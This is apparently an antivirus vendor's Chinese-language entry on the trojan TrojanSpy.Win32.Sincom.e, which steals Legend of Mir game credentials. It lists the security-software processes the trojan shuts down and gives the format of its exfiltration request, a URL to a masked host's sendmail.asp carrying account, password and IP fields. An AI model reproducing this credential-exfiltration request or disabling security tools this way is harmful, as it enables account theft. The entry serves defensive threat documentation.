概要
病毒別名:TrojanSpy.Win32.Sincom.e【AVP】
處理時間:
威脅級別:★★
中文名稱:
病毒類型:木馬
影響系統:Win9x / WinNT
病毒行為:
該病毒運行後會竊取用戶的傳奇賬號密碼,並把這些信息,傳送給木馬種植者,導致感染機器用戶在傳奇遊戲中的角色被他人控制。該病毒還會關閉常見的防毒軟體,以防止自己被防毒軟體清除。
1、關閉以下進程,以防止被查殺
kvapfw.exe
kvfw.exe
DFVSNET.EXE.
PasswordGuard.exe
EGhost.exe
Iparmor.exe
pfw.exe
2、病毒發現傳奇帳號密碼後,會按以下格式傳送到指定的ASP腳本,ASP腳本再轉發郵件
www.5×××9.com///cqtstsqj/mmmm/sendmail.asp?tomail=××××&;mailSubject=註冊版&FromName=×××&frommail=×××&Priority=3&Submit=%B7%A2+%CB%CD&&action=send&mailbody=區號:×××用戶名:×××伺服器:×××對方ip地址:×××對方發信時間:×××密碼×××
